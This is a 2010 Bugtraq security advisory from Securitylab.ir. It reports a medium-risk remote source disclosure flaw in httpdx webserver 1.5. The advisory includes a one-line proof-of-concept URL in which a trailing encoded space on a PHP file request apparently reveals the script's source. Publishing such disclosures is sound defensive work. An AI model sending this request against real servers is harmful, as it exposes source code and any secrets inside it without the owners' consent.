
Date: 2 Jan 2010 08:10:45 -0000
From: info@...uritylab.ir
To: bugtraq@...urityfocus.com
Subject: httpdx webserver v1.5 Remote Source Disclosure

#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: httpdx webserver 
# Version:  1.5
#################################################################
# Vulnerability Info:
# Type: Remote Source Disclosure
# Risk: Medium
#################################################################
# Vulnerability:
# http://127.0.0.1/file.php%20
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@...uritylab[dot]ir
###################################################################
